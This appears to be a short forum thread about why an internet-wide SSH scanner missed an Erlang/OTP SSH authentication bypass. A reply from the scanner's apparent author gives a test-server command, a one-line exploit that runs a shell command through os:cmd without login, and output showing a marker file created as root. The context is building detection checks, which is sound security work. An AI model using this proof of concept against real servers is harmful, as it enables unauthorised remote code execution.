chc4 6 days ago

I'm vaguely surprised that https://www.runzero.com/sshamble/ didn't find this. They did a scan over the entire internet trying invalid SSH state machine transitions, which I guess didn't cover this sequence.

hdmoore 6 days ago | parent [-]

I was too! The reason is that the Go x/crypto/ssh library was bailing out on the lack of reply to the channel open request, which prevented it from reaching the auth bypass check via exec. I should have an update out soon with this fixed and an RCE check for this issue.

The test server: $ erl -eval 'ssh:start(), ssh_dbg:on(), ssh:daemon(34222, [{system_dir, "/home/otp/ssh/keys"},{user_dir, "/home/otp/ssh/users/otptest/.ssh"}]).'

The exploit: auth.ScrapeExec(options, addr+" "+tname, res, ses, `os:cmd("touch /tmp/HAXXXED").`)

> -rw-r--r-- 1 root root 0 Apr 17 16:14 /tmp/HAXXXED